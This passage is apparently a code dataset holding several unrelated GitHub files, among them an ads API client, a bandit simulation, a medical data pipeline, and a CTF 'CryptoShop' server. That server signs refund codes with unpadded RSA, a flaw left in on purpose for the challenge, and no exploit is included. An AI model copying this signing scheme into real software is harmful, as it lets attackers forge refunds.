headers=headers)\n\n @sp_endpoint('/sp/negativeKeywords', method='POST')\n def create_negative_keyword(self, version: int = 3, prefer: bool = False, **kwargs) -> ApiResponse:\n r\"\"\"\n Creating negative product keywords.\n\n Request Body (required)\n | **nativeLanguageKeyword** : (*string*), The unlocalized keyword text in the preferred locale of the advertiser\n | **nativeLanguageLocale** : (*string*), The locale preference of the advertiser.\n | **campaignId**: *string*, The identifer of the campaign to which the keyword is associated.\n | **adGroupId**: *string*, The identifier of the ad group to which this keyword is associated\n | **state**: *string*, The current resource state.' , 'Enum': '[ enabled ]\n | **keywordText**: *string*, The text of the expression to match against a search query.\n | **matchType**: *string*, 'The type of match.' , 'Enum': '[ NEGATIVE_EXACT, NEGATIVE_PHRASE, NEGATIVE_BROAD ]\n\n Returns\n ApiResponse\n \"\"\"\n json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n prefer_value = 'return=representation'\n if prefer:\n headers.update({\"Prefer\": prefer_value})\n\n return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, headers=headers)\n\n @sp_endpoint('/sp/negativeKeywords', method='PUT')\n def edit_negative_keyword(self, version: int = 3, prefer: bool = False, **kwargs) -> ApiResponse:\n r\"\"\"\n Updating negative product keywords.\n\n Request Body (required) :\n | '**keywordId**': *string*, (required) {'description': 'The identifer of the campaign to which the keyword is associated.'}\n | '**state**': *string*, {'description': 'The current resource state.' , 'Enum': '[ enabled, paused, archived ]'}\n\n\n Returns\n ApiResponse\n \"\"\"\n json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n prefer_value = 'return=representation'\n if prefer:\n headers.update({\"Prefer\": prefer_value})\n\n return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, headers=headers)\n\n @sp_endpoint('/sp/negativeKeywords/delete', method='POST')\n def delete_negative_keywords(self, version: int = 3, **kwargs) -> ApiResponse:\n r\"\"\"\n Deleting negative product keywords.\n\n Request Body (required)\n | **keywordIdFilter** {} : Filter negative keywords by the list of objectIds\n include [string] : list of negativeKeywordsIds as String to be used as filter. MinItems : 0, MaxItems :1000\n\n Returns\n ApiResponse\n \"\"\"\n\n json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, headers=headers)\n","repo_name":"denisneuf/python-amazon-ad-api","sub_path":"ad_api/api/sp/negative_keywords_v3.py","file_name":"negative_keywords_v3.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"77"} +{"seq_id":"24457947342","text":"from pydantic import Field\nfrom typing import Optional, Union\nfrom ayaka import AyakaApp, AyakaInput, MessageSegment, msg_type\n\n\nclass UserInput(AyakaInput):\n value: Optional[Union[msg_type.T_At, int, str]] = Field(\n description=\"查询目标的QQ号/名称/@xx\")\n\n def is_uid(self):\n return isinstance(self.value, (MessageSegment, int))\n\n def get_value(self):\n if isinstance(self.value, MessageSegment):\n return int(self.value.data[\"qq\"])\n if isinstance(self.value, str) and self.value.startswith(\"@\"):\n return self.value[1:]\n return self.value\n\n\nasync def get_uid_name(app: AyakaApp, data: UserInput):\n users = await app.bot.get_group_member_list(group_id=app.group_id)\n value = data.get_value()\n\n if data.is_uid():\n for user in users:\n uid = user[\"user_id\"]\n if uid == value:\n name = user[\"card\"] or user[\"nickname\"]\n return uid, name\n return 0, \"\"\n else:\n for user in users:\n name = user[\"card\"] or user[\"nickname\"]\n if name == value:\n uid = user[\"user_id\"]\n return uid, name\n return 0, \"\"\n","repo_name":"bridgeL/nonebot-plugin-ayaka-who-is-suspect","sub_path":"ayaka_who_is_suspect/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7786702049","text":"import time\nimport RPi.GPIO as GPIO\n\npinLS_Buka = 22\npinLS_Tutup = 27\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pinLS_Buka, GPIO.IN)\nGPIO.setup(pinLS_Tutup, GPIO.IN)\n\ncount = 0\ntry: \n\twhile True:\n\t\tbuka = GPIO.input(pinLS_Buka)\n\t\ttutup = GPIO.input(pinLS_Tutup)\n\n\t\tif buka == True:\n\t\t\tprint(\"Pintu terbuka, \", count)\n\t\t\ttime.sleep(0.02)\n\n\t\telif tutup == True:\n\t\t\tprint(\"Pintu tertutup, \", count)\n\t\t\ttime.sleep(0.02)\n\n\t\telse:\n\t\t\tprint(\"Tombol tidak ditekan, \", count)\n\t\t\ttime.sleep(0.02)\n\n\t\tcount += 1\n\nexcept KeyboardInterrupt:\n\tprint(\"Program Stop\")\n\nexcept:\n\tprint(\"Other Error or exception occured!\")\n\nfinally:\n\tGPIO.cleanup()","repo_name":"ImamMuis/TugasAkhir","sub_path":"component_testing/testLimitSwitch.py","file_name":"testLimitSwitch.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17710348723","text":"import time\nfrom datetime import datetime\nimport re\nimport numpy as np\nimport pandas as pd\nimport string\n\n## Input\nwith open('input.txt') as f:\n input = f.read()\n\nlines = input.strip().split('\\n')\n\n## Is this a reacting pair?\ndef isPair(a,b):\n\tif (a == b.lower() and b == a.upper()) or (b == a.lower() and a == b.upper()):\n\t\treturn True\n\telse:\n\t\treturn False\n\n#print(isPair('a','A'))\n#print(isPair('a','a'))\n\n#Input string and counters\nmyString = lines[0]\ni = 0\nb = len(myString)\n\n# React the string\nwhile i < b-1:\n\tif isPair(myString[i],myString[i+1]): #if pair\n\t\tmyString = myString[:i] + myString[(i+2):] #remove characters\n\t\ti = i - 1 #move index back to check\n\t\tb = b - 2 #adjust for new length of string\n\telse:\n\t\ti = i + 1 #else move forward\n\tif i < 0: #don't get stuck at index -1!\n\t\ti = 0\n\t#print(myString)\n\t# if i%100 == 0 or b%100 == 0:\n\t# \tprint(i,b)\nprint(len(myString)) #answer","repo_name":"srmwright/advent","sub_path":"2018/5/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9302729446","text":"from greedy_pick import GreedyPick\nimport random\n\nclass EpsilonGreedyPick():\n\tdef __init__(self, total_play_times, levers, greed, epsilon, premilinary_exploration) -> None:\n\t\tself.total_play_times = total_play_times\n\t\tself.levers = levers\n\t\tself.amount_of_levers = len(self.levers.get_levers())\n\t\tself.greed = greed\n\t\tself.epsilon = epsilon\n\t\tself.premilinary_exploration = premilinary_exploration\n\t\tself.average_return_per_lever = [0] * self.amount_of_levers\n\t\tself.amount_of_plays_per_lever = [0] * self.amount_of_levers\n\n\tdef _explore(self):\n\t\tgreedy_pick = GreedyPick(self.total_play_times, self.levers, self.greed)\n\t\treturn greedy_pick.explore()\n\n\tdef _pick_random_choice(self):\n\t\tchoice = random.randint(0, self.amount_of_levers-1)\n\t\tresult_of_choice = self.levers.pick_lever(choice)\n\t\tself.gain += result_of_choice\n\t\tself._calculate_new_average_and_amount(choice, result_of_choice)\n\n\tdef _pick_best_choice(self):\n\t\tbest_pick = self.average_return_per_lever.index(max(self.average_return_per_lever))\n\t\tresult_of_choice = self.levers.pick_lever(best_pick)\n\t\tself.gain += result_of_choice\n\t\tself._calculate_new_average_and_amount(best_pick, result_of_choice)\n\n\tdef play(self):\n\t\tself.gain = 0\n\t\tif self.premilinary_exploration:\n\t\t\tself.average_return_per_lever = self._explore()\n\t\t\tself.amount_of_plays_per_lever = [self.greed] * self.amount_of_levers\n\t\tfor _ in range(0, self.total_play_times):\n\t\t\trandom_chance = random.uniform(0, 1)\n\t\t\tif random_chance <= self.epsilon:\n\t\t\t\tself._pick_random_choice()\n\t\t\telse:\n\t\t\t\tself._pick_best_choice()\n\t\treturn (self.amount_of_plays_per_lever, self.gain)\n\n\tdef _calculate_new_average_and_amount(self, choice, result):\n\t\tnew_average = (self.average_return_per_lever[choice] * self.amount_of_plays_per_lever[choice] + result)/(self.amount_of_plays_per_lever[choice] + 1)\n\t\tself.average_return_per_lever[choice] = new_average\n\t\tself.amount_of_plays_per_lever[choice] += 1\n\n\t","repo_name":"dorinm17/connect_four_statistics","sub_path":"part3/epsilon_greedy_pick.py","file_name":"epsilon_greedy_pick.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38126563642","text":"from typing import Union\nfrom typing import Set\n\n# pip install pycryptodome\nimport Crypto\nfrom Crypto.PublicKey import RSA\n\nSHOP_ITEMS = {\n \"USB Rubber Ducky\": 1,\n \"Malduino\": 2,\n \"WIFI Deauther\": 3,\n \"Bluetooth Jammer\": 5,\n \"GSM Jammer\": 7,\n \"Bad USB\": 10,\n \"CTF-Flag\": 1000,\n}\n\nFLAG = open(\"flag.txt\", \"r\").read()\n\n\ndef calc_refund_code(price: int, d: int, n: int):\n return pow(price, d, n)\n\n\nclass ShopTransaction:\n def __init__(\n self,\n name: str,\n price: int,\n priv_key: Crypto.PublicKey.RSA.RsaKey\n ):\n self.name = name\n self.price = price\n self.refund_code = calc_refund_code(self.price, priv_key.d, priv_key.n)\n\n def __str__(self):\n return f\"{self.name}: {self.price}(Refund-Code: {self.refund_code})\"\n\n\nclass ShopState:\n def __init__(\n self,\n name: str,\n balance: int = 5,\n priv_key: Crypto.PublicKey.RSA.RsaKey = None\n ):\n self.name = name\n self.balance = balance\n self.prev_refunds: Set[int] = set()\n self.priv_key = priv_key\n self.pub_key = self.priv_key.public_key()\n\n def refund_item(self, price: int, refund_code: int) -> int:\n if refund_code in self.prev_refunds:\n return -1\n\n reference_code = calc_refund_code(\n price,\n self.priv_key.d,\n self.priv_key.n\n )\n\n if refund_code != reference_code:\n print(type(refund_code))\n print(type(reference_code))\n print(\"Refund-Code\\n\", reference_code)\n print(\"Calculated-Code\\n\", refund_code)\n return -2\n\n self.balance += price\n\n return 0\n\n def buy(self, name: str) -> Union[ShopTransaction, int]:\n price = SHOP_ITEMS[name]\n\n if self.balance < price:\n return -1\n\n self.balance -= price\n\n if name == \"CTF-Flag\":\n print(f\"Take this: {FLAG}\")\n\n return ShopTransaction(name, price, self.priv_key)\n\n\ndef generate_keys() -> Crypto.PublicKey.RSA.RsaKey:\n key = RSA.generate(1024)\n\n return key\n\n\ndef buy_menu(shop_state: ShopState) -> int:\n\n print(\"What item do you want to bye?\")\n\n for i, item in enumerate(SHOP_ITEMS):\n print(f\"{i}. {item}\")\n\n print()\n item_name = input(\"> \").strip()\n\n if item_name not in SHOP_ITEMS.keys():\n print(f\"Error! Item {item_name} could not be found\")\n return -1\n\n shop_transaction = shop_state.buy(item_name)\n\n if isinstance(shop_transaction, int) and shop_transaction == -1:\n print(\"Error, not enough money\")\n return 0\n\n print(f\"Bought {shop_transaction.name} for {shop_transaction.price}\")\n print(f\"Refund-Code:\\n{shop_transaction.refund_code}\")\n return 0\n\n\ndef refund_menu(shop_state: ShopState) -> int:\n print(\"What do you want to refund?\")\n print(\"Please provide the refundcode\")\n refund_code = input(\"> \").strip()\n print(\"Please provide the price\")\n refund_amount = input(\"> \").strip()\n\n try:\n refund_amount = int(refund_amount)\n except ValueError:\n print(f\"Value {refund_amount} not a valid price\")\n return 0\n try:\n refund_code = int(refund_code)\n except ValueError:\n print(f\"Invalid {refund_code}\")\n return 0\n\n ret_val = shop_state.refund_item(refund_amount, refund_code)\n\n if ret_val == 0:\n print(\"Successfully refunded\")\n\n if ret_val == -1:\n print(\"Error, this refund code was already used!!\")\n\n if ret_val == -2:\n print(\"Error, this refund code does not match the price!\")\n\n return 0\n\n\ndef display_menu():\n key = generate_keys()\n\n print(\"Welcome to the PWN-Store. Please authenticate:\")\n user = input(\"Your Name: \")\n print(f\"Welcome back {user}!\")\n\n user_shop_state = ShopState(user, priv_key=key)\n\n print(f\"Customernumber: {user_shop_state.pub_key.n}\")\n\n while True:\n print()\n print(f\"Accountname: {user} (Balance: {user_shop_state.balance}€)\")\n print(\"1. List Items\")\n print(\"2. Buy Item\")\n print(\"3. Refund Item\")\n print(\"4. Exit\")\n print()\n action = input(\"> \")\n\n try:\n action = int(action.strip())\n except ValueError:\n print(f\"Error, {action} is not a valid number!\")\n continue\n\n if action < 0 or action > 5:\n print(f\"Error, {action} is not a valic action\")\n\n if action == 1:\n for i, item in enumerate(SHOP_ITEMS):\n print(f\"{i}. {item} (Price: {SHOP_ITEMS[item]})\")\n\n if action == 2:\n ret_val = buy_menu(user_shop_state)\n if ret_val != 0:\n print(\"An Error occured! Exiting\")\n break\n\n if action == 3:\n refund_menu(user_shop_state)\n\n if action == 4:\n break\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(display_menu())\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/Glacier/2022/crypto/CryptoShop/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"1692429034","text":"from functools import partial\nfrom os import name\nfrom pywebio import start_server\nfrom pywebio.input import NUMBER, input, TEXT, input_group,radio\nfrom pywebio.output import put_code, put_html, put_markdown, put_text, put_buttons,put_table, clear\nfrom bokeh.io import output_notebook,show\nfrom bokeh.io import show,output_file,output_notebook\nfrom bokeh.plotting import figure\nfrom pywebio.session import hold\nfrom correlacaoPearson import recommend, users,artists\n\nlist_of_users = []\navaliation_artists_media = []\nmy_avaliation = []\nuser_name = ''\n\ndef refactor():\n for e in users:\n user = e\n avaliations = []\n for key in artists: #avalia se o artista existe no array de artistas\n if(key not in users[e]):\n #avaliations.append(users[e][key])\n avaliations.append('-')\n else:\n avaliations.append(users[e][key])\n list_of_users.append(list(user.split())+avaliations)\n #print(list_of_users)\n\ndef mediaArtistas():\n for artist in artists:\n n = 0\n soma = 0\n for user in users:\n if(artist in users[user]):\n soma+=users[user][artist]\n n+=1\n avaliation_artists_media.append(soma/n)\n\n\n\ndef checkName(name):\n if(name == ''):\n return 'Digite o seu nome!'\n\ndef checkAvaliacaoNumero(value):\n if(float(value) <0 or float(value) > 5):\n return 'Valor inválido!'\n\ndef btnclick(name,btn_val):\n if(btn_val == 'sim'):\n clear()\n avaliar_artistas(name)\n elif(btn_val == \"não\"):\n exit(-1)\n\n\ndef refactor_my_avaliation(avaliacao):\n list_of_valid_avaliations = []\n for e,i in enumerate(avaliacao):\n if(e>0 and not i == '-'):\n list_of_valid_avaliations.append(float(i))\n\n concat = list(zip(artists,list_of_valid_avaliations))\n dic = dict(concat)\n return (avaliacao[0],dic)\n\n\ndef avaliar_artistas(name):\n array_avaliacao = []\n array_avaliacao.append(name)\n put_text('Iniciando nova avaliação')\n for e in artists:\n avaliacao = input('como você avalia %s'%e)\n if(avaliacao == '' or float(avaliacao) < 0 or float(avaliacao)>5):\n array_avaliacao.append('-')\n else:\n array_avaliacao.append(avaliacao)\n put_text(\"Deseja confirmar as avaliações\")\n put_table([artists]+[array_avaliacao[1:]])\n put_buttons(['sim','não'],onclick=partial(avaliacao_btn, array_avaliacao))\n\n\ndef avaliacao_btn(avaliacao, btn_val):\n if(btn_val == 'sim'):\n clear()\n list_of_users.append(avaliacao)\n my_avaliation = refactor_my_avaliation(avaliacao)\n put_table([['Usuários']+artists]+list_of_users)\n plotar_grafico()\n put_buttons(['ver recomendações'], onclick=partial(mostrar_recomendacao, my_avaliation))\n elif(btn_val == \"não\"):\n exit(-1)\n\n\ndef put_on_pearson(avaliacao):\n pass\n\ndef put_on_similaridade_cosseno(avaliacao):\n pass\n\ndef mostrar_recomendacao(avaliacao,btn_val):\n users[avaliacao[0]] = avaliacao[1]\n recomendations =recommend(avaliacao[0],users)\n #clear()\n print(recomendations)\n put_markdown('## %s, Talvez você goste dessas bandas!'%avaliacao[0])\n put_table([[x[0]] for x in recomendations],['Recomendações de Bandas'])\n\n\ndef plotar_grafico():\n put_markdown(\"# Média de avaliações de artistas\")\n p = figure(x_range=artists, plot_height=250, title=\"Avaliações dos artistas\",\n toolbar_location=None, tools=\"\")\n p.vbar(x=artists, top=avaliation_artists_media, width=0.9)\n\n p.xgrid.grid_line_color = None\n p.y_range.start = 0\n\n show(p)\n put_html('
')\n\n\n\ndef main():\n refactor()\n mediaArtistas()\n output_notebook(notebook_type='pywebio') #\n #start\n\n name = input(\"Qual o seu nome?\", type=TEXT, validate=checkName)\n\n\n if(name != ''):\n put_markdown('## Olá %s, Aqui estão algumas bandas já avaliadas por algumas pessoas!'%name)\n put_table([['Usuários']+artists]+list_of_users)\n\n plotar_grafico()\n\n put_text(\"Deseja avaliar algum artista?\")\n put_buttons(['sim','não'],onclick=partial(btnclick, name))\n\n hold()\n\n\n\nif __name__ == '__main__':\n start_server(main, port=8080, debug=True)\n","repo_name":"silascastro/Sistema-de-recomendacao","sub_path":"recomendation_system/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37497098331","text":"import pandas as pd\nimport os\n\nfrom geneva_stroke_unit_preprocessing.patient_selection.filter_ehr_patients import filter_ehr_patients\nfrom geneva_stroke_unit_preprocessing.patient_selection.restrict_to_patient_selection import restrict_to_patient_selection\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.admission_params_preprocessing import preprocess_admission_data\nfrom geneva_stroke_unit_preprocessing.lab_preprocessing.lab_preprocessing import preprocess_labs\nfrom geneva_stroke_unit_preprocessing.scales_preprocessing.scales_preprocessing import preprocess_scales\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.timing_params_preprocessing import preprocess_timing_params\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.treatment_params_preprocessing import \\\n treatment_params_preprocessing\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.utils import set_sample_date\nfrom geneva_stroke_unit_preprocessing.utils import create_registry_case_identification_column\nfrom geneva_stroke_unit_preprocessing.variable_assembly.variable_selection import restrict_to_selected_variables\nfrom geneva_stroke_unit_preprocessing.ventilation_preprocessing.ventilation_preprocessing import preprocess_ventilation\nfrom geneva_stroke_unit_preprocessing.vitals_preprocessing.vitals_preprocessing import preprocess_vitals\n\nfrom geneva_stroke_unit_preprocessing.prescription_preprocessing.anti_hypertensive_strategy_extraction import \\\n extract_anti_hypertensive_strategy\n\n\ndef load_data_from_main_dir(data_path: str, file_start: str) -> pd.DataFrame:\n files = [pd.read_csv(os.path.join(data_path, f), delimiter=';', encoding='utf-8',\n dtype=str)\n for f in os.listdir(data_path)\n if f.startswith(file_start)]\n return pd.concat(files, ignore_index=True)\n\n\ndef get_first_sample_date(df):\n datatime_format = '%d.%m.%Y %H:%M'\n df['sample_date_dt'] = pd.to_datetime(df['sample_date'], format=datatime_format)\n first_sample_date = df.groupby('case_admission_id').sample_date_dt.min()\n df.drop(columns=['sample_date_dt'], inplace=True)\n first_sample_date = first_sample_date.reset_index(level=0)\n first_sample_date.rename(columns={'sample_date_dt': 'first_sample_date'}, inplace=True)\n first_sample_date['first_sample_date'] = first_sample_date['first_sample_date'].dt.strftime(datatime_format)\n\n return first_sample_date\n\n\ndef assemble_variable_database(raw_data_path: str, stroke_registry_data_path: str,\n patient_selection_path: str,\n variable_selection_path: str,\n verbose: bool = False,\n use_stroke_registry_data: bool = True,\n log_dir:str = '') -> pd.DataFrame:\n \"\"\"\n 1. Restrict to patient selection (done after geneva_stroke_unit_preprocessing for EHR data and before processing for stroke registry data)\n 2. Preprocess EHR and stroke registry data\n 3. Restrict to variable selection\n 4. Assemble database from lab/scales/ventilation/vitals + stroke registry subparts\n\n Args:\n raw_data_path: path to EHR data folder\n stroke_registry_data_path: path to stroke registry data\n patient_selection_path: path to patient selection\n variable_selection_path: path to variable selection (should be same format as in ./selected_variables_example.xlsx)\n verbose: print verbose output\n use_stroke_registry_data: whether to use stroke registry data\n log_dir: directory to save log files\n\n Returns:\n :return: Dataframe with all features under sample_label, value, sample_date, source\n \"\"\"\n # load eds data\n eds_df = pd.read_csv(os.path.join(raw_data_path, 'eds_j1.csv'), delimiter=';', encoding='utf-8',\n dtype=str)\n eds_df = filter_ehr_patients(eds_df, patient_selection_path)\n\n # Load and preprocess lab data\n lab_file_start = 'labo'\n lab_df = load_data_from_main_dir(raw_data_path, lab_file_start)\n lab_df = filter_ehr_patients(lab_df, patient_selection_path)\n preprocessed_lab_df = preprocess_labs(lab_df, verbose=verbose, log_dir=log_dir)\n preprocessed_lab_df = preprocessed_lab_df[['case_admission_id', 'sample_date', 'dosage_label', 'value']]\n preprocessed_lab_df.rename(columns={'dosage_label': 'sample_label'}, inplace=True)\n preprocessed_lab_df['source'] = 'EHR'\n\n # Load and preprocess scales data\n scales_file_start = 'scale'\n scales_df = load_data_from_main_dir(raw_data_path, scales_file_start)\n # Filtering out patients not in patient selection has to be done after geneva_stroke_unit_preprocessing for scale data\n scales_df = preprocess_scales(scales_df, eds_df, patient_selection_path, verbose=verbose)\n scales_df = scales_df[['scale', 'event_date', 'score', 'case_admission_id']]\n scales_df.rename(columns={'scale': 'sample_label', 'score': 'value', 'event_date': 'sample_date'}, inplace=True)\n scales_df['source'] = 'EHR'\n\n # Load and preprocess vitals data\n vitals_file_start = 'patientvalue'\n vitals_df = load_data_from_main_dir(raw_data_path, vitals_file_start)\n vitals_df = filter_ehr_patients(vitals_df, patient_selection_path)\n vitals_df = preprocess_vitals(vitals_df, verbose=verbose)\n vitals_df = vitals_df[['case_admission_id', 'datetime', 'vital_value', 'vital_name']]\n vitals_df.rename(columns={'vital_name': 'sample_label', 'vital_value': 'value', 'datetime': 'sample_date'},\n inplace=True)\n vitals_df['source'] = 'EHR'\n\n # Treatment strategy\n prescription_file_start = 'prescription'\n prescription_df = load_data_from_main_dir(raw_data_path, prescription_file_start)\n prescription_df = filter_ehr_patients(prescription_df, patient_selection_path)\n anti_hypertensive_strategy_df = extract_anti_hypertensive_strategy(prescription_df, interval=60, verbose=verbose)\n anti_hypertensive_strategy_df = anti_hypertensive_strategy_df[['case_admission_id', 'sample_date', 'target_strategy', 'impute_missing_as']]\n anti_hypertensive_strategy_df.rename(columns={'target_strategy': 'value'}, inplace=True)\n anti_hypertensive_strategy_df['sample_label'] = 'anti_hypertensive_strategy'\n anti_hypertensive_strategy_df['source'] = 'EHR'\n\n # Find first sample date in EHR for each patient, this will be used for the inference of FiO2\n intermediate_feature_data = pd.concat([preprocessed_lab_df, scales_df, vitals_df, anti_hypertensive_strategy_df], ignore_index=True)\n first_sample_date_df = get_first_sample_date(intermediate_feature_data)\n\n # Load and preprocess ventilation data (this has to be done last, to have access to the first sample date)\n ventilation_file_start = 'ventilation'\n ventilation_df = load_data_from_main_dir(raw_data_path, ventilation_file_start)\n ventilation_df = filter_ehr_patients(ventilation_df, patient_selection_path)\n fio2_df, spo2_df = preprocess_ventilation(ventilation_df, first_sample_date_df, verbose=verbose)\n fio2_df = fio2_df[['case_admission_id', 'FIO2', 'datetime']]\n fio2_df['sample_label'] = 'FIO2'\n fio2_df.rename(columns={'FIO2': 'value', 'datetime': 'sample_date'}, inplace=True)\n fio2_df['source'] = 'EHR'\n spo2_df = spo2_df[['case_admission_id', 'spo2', 'datetime']]\n spo2_df['sample_label'] = 'oxygen_saturation'\n spo2_df.rename(columns={'spo2': 'value', 'datetime': 'sample_date'}, inplace=True)\n spo2_df['source'] = 'EHR'\n\n # Assemble feature database\n feature_database = pd.concat([preprocessed_lab_df, scales_df, fio2_df, spo2_df, vitals_df,\n anti_hypertensive_strategy_df], ignore_index=True)\n feature_database = restrict_to_patient_selection(feature_database, patient_selection_path, verbose=verbose,\n restrict_to_event_period=True)\n\n # Load and preprocess admission data from stroke registry\n if use_stroke_registry_data:\n if verbose:\n print('Preprocessing stroke registry_data')\n # Load stroke registry data and restrict to patient selection\n stroke_registry_df = pd.read_excel(stroke_registry_data_path)\n stroke_registry_df['patient_id'] = stroke_registry_df['Case ID'].apply(lambda x: x[8:-4])\n stroke_registry_df['EDS_last_4_digits'] = stroke_registry_df['Case ID'].apply(lambda x: x[-4:])\n stroke_registry_df['case_admission_id'] = create_registry_case_identification_column(stroke_registry_df)\n\n # set sample date to stroke onset or arrival at hospital, whichever is later\n stroke_registry_df = set_sample_date(stroke_registry_df)\n\n restricted_stroke_registry_df = restrict_to_patient_selection(stroke_registry_df, patient_selection_path,\n verbose=verbose, restrict_to_event_period=False)\n\n admission_data_df = preprocess_admission_data(restricted_stroke_registry_df, verbose=verbose)\n admission_data_df['source'] = 'stroke_registry'\n\n timings_df = preprocess_timing_params(restricted_stroke_registry_df)\n timings_df['source'] = 'stroke_registry'\n\n treatment_data_df = treatment_params_preprocessing(restricted_stroke_registry_df)\n treatment_data_df['source'] = 'stroke_registry'\n\n selected_stroke_registry_data_df = pd.concat([admission_data_df, timings_df, treatment_data_df],\n ignore_index=True)\n\n # Only keep case_admissions that are in the EHR data and in the stroke registry data (intersection)\n # (FIO2 are excluded from this count, as it is inferred from when missing - thus all patients have FIO2)\n ehr_cid_before_restriction_to_registry = feature_database[feature_database.sample_label != 'FIO2']['case_admission_id'].unique()\n intersection_ehr_registry = set(ehr_cid_before_restriction_to_registry)\\\n .intersection(set(selected_stroke_registry_data_df['case_admission_id'].unique()))\n # 1. Restrict EHR to intersection (EHR /intersect/ registry)\n feature_database = feature_database[feature_database['case_admission_id'].isin(intersection_ehr_registry)]\n print('Number of cases from EHR data (after restriction to patient selection) not found in registry:',\n len(ehr_cid_before_restriction_to_registry) - len(feature_database[feature_database.sample_label != 'FIO2']['case_admission_id'].unique()))\n # 2. Restrict registry to intersection (EHR /intersect/ registry)\n n_registry_cid_before_restriction_to_ehr = len(selected_stroke_registry_data_df['case_admission_id'].unique())\n selected_stroke_registry_data_df = selected_stroke_registry_data_df[\n selected_stroke_registry_data_df['case_admission_id'].isin(intersection_ehr_registry)]\n print('Number of cases from registry not found in EHR data:', n_registry_cid_before_restriction_to_ehr - len(\n selected_stroke_registry_data_df['case_admission_id'].unique()))\n\n feature_database = pd.concat([feature_database, selected_stroke_registry_data_df], ignore_index=True)\n\n # Restrict to variable selection\n feature_database = restrict_to_selected_variables(feature_database, variable_selection_path, enforce=True)\n\n if log_dir != '':\n # save cids of patients in selection and that are not included in the feature_database\n patient_selection_df = pd.read_csv(patient_selection_path, dtype=str)\n cids_in_selection = set(create_registry_case_identification_column(patient_selection_df).unique())\n cids_in_feature_database = set(feature_database['case_admission_id'].unique())\n cids_not_found_in_feature_database = cids_in_selection.difference(cids_in_feature_database)\n cids_in_database_not_found_in_selection = cids_in_feature_database.difference(cids_in_selection)\n assert len(cids_in_database_not_found_in_selection) == 0, 'Unselected patients found in database'\n cids_not_found_in_feature_database_df = pd.DataFrame(cids_not_found_in_feature_database, columns=['case_admission_id'])\n cids_not_found_in_feature_database_df.to_csv(os.path.join(log_dir, 'missing_cids_from_feature_database.tsv'), sep='\\t', index=False)\n\n return feature_database\n","repo_name":"JulianKlug/Stroke-Unit-Preprocessing","sub_path":"geneva_stroke_unit_preprocessing/variable_assembly/variable_database_assembly.py","file_name":"variable_database_assembly.py","file_ext":"py","file_size_in_byte":12426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1987145392","text":"from datetime import datetime\n\nfrom django.http import HttpResponse, HttpRequest\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import Group\nfrom shopapp.models import Product, Order\n\n\ndef shop_index(request: HttpRequest) -> HttpResponse:\n products = [\n ('Laptop', 2000),\n ('Smartphone', 3000),\n ('Notebook', 5000),\n ]\n context = {\n 'time_now': datetime.now(),\n 'products': products,\n }\n return render(request, 'shopapp/shop-index.html', context=context)\n\ndef groups_list(request):\n context = {\n 'groups': Group.objects.all()\n }\n return render(request, 'shopapp/groups-list.html', context=context)\n\ndef products_list(request):\n context = {\n 'products': Product.objects.all()\n }\n return render(request, 'shopapp/products-list.html', context=context)\n\ndef order_list(request):\n context = {\n 'orders': Order.objects.select_related('user').prefetch_related('products').all()\n }\n return render(request, 'shopapp/order-list.html', context=context)","repo_name":"Maroderik1/Python","sub_path":"myproject/shopapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21504147111","text":"#!/usr/bin/env pybricks-micropython\n\n# Importing the required EV3 modules and libraries\n# from pybricks import ev3brick as brick\n# from pybricks.ev3devices import (Motor, TouchSensor, ColorSensor, InfraredSensor, UltrasonicSensor, GyroSensor)\nfrom pybricks.ev3devices import (Motor, ColorSensor)\n# from pybricks.parameters import (Port, Stop, Direction, Button, Color, SoundFile, ImageFile, Align)\nfrom pybricks.parameters import (Port, Stop, Direction)\nfrom pybricks.tools import print, wait, StopWatch\nfrom pybricks.robotics import DriveBase\n\ndef angleToDistance(angle): # Function that returns the distance when the wheels are moved by x degrees\n return angle / 360 * 196.035381584 # Diameter of the wheels.\n\ndef distanceToAngle(distance): # Function that returns the angle by which the wheels need to be moved to move x mm\n return distance * 360 / 196.035381584 # Diameter of the wheels.\n\ndef resetAngles(): # Resets the angles of both Large motors to 0\n left_motor.reset_angle(0)\n right_motor.reset_angle(0)\n\ndef 